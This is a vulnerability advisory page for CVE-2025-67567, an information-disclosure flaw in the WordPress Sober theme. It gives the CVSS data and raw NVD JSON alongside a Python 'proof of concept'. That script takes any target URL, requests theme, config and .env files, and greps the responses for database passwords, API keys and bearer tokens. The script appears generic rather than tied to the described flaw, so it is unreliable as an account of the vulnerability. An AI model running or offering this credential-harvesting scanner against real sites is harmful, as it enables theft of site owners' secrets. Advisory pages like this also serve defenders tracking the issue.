Security Vulnerability Report
中文
CVE-2025-67567 CVSS 5.3 MEDIUM

CVE-2025-67567

Published: 2025-12-09 16:18:33
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in uixthemes Sober sober allows Retrieve Embedded Sensitive Data.This issue affects Sober: from n/a through <= 3.5.11.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Sober Theme <= 3.5.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67567 PoC - WordPress Sober Theme Sensitive Data Exposure # This PoC demonstrates the information disclosure vulnerability import requests import re from urllib.parse import urljoin def check_sober_theme_version(target_url): """Check if target is running vulnerable Sober theme""" # Common paths for Sober theme paths = [ '/wp-content/themes/sober/style.css', '/wp-content/themes/sober/functions.php', '/wp-content/themes/sober/readme.txt', '/wp-content/themes/sober/package.json' ] vulnerable_paths = [] for path in paths: url = urljoin(target_url, path) try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: vulnerable_paths.append(url) # Check for version information version_match = re.search(r'Version:\s*([\d.]+)', response.text) if version_match: version = version_match.group(1) if tuple(map(int, version.split('.'))) <= (3, 5, 11): print(f"[+] Vulnerable version detected: {version}") except Exception as e: print(f"[-] Error accessing {url}: {e}") return vulnerable_paths def extract_sensitive_data(target_url): """Attempt to extract sensitive information from theme files""" sensitive_patterns = [ r'DB_HOST', r'DB_NAME', r'DB_USER', r'DB_PASSWORD', r'api_key', r'API_KEY', r'secret', r'password', r'wp-config', r'Auth.*:.*', r'Bearer.*' ] files_to_check = [ '/wp-content/themes/sober/functions.php', '/wp-content/themes/sober/includes/config.php', '/wp-content/themes/sober/config.yaml', '/wp-content/themes/sober/.env' ] findings = [] for file_path in files_to_check: url = urljoin(target_url, file_path) try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: for pattern in sensitive_patterns: matches = re.findall(f'.*{pattern}.*', response.text, re.IGNORECASE) if matches: findings.extend(matches) except: pass return list(set(findings)) def main(): target = input("Enter target URL (e.g., https://example.com): ") print(f"[*] Scanning {target} for CVE-2025-67567...") # Check for vulnerable theme paths = check_sober_theme_version(target) if paths: print(f"[+] Sober theme detected at: {paths}") # Attempt to extract sensitive data print("[*] Attempting to extract sensitive information...") findings = extract_sensitive_data(target) if findings: print("[!] Sensitive information found:") for finding in findings: print(f" - {finding}") else: print("[-] No sensitive information extracted in this basic check") else: print("[-] Sober theme not detected or not vulnerable") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67567", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:33.427", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in uixthemes Sober sober allows Retrieve Embedded Sensitive Data.This issue affects Sober: from n/a through <= 3.5.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/sober/vulnerability/wordpress-sober-theme-3-5-11-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}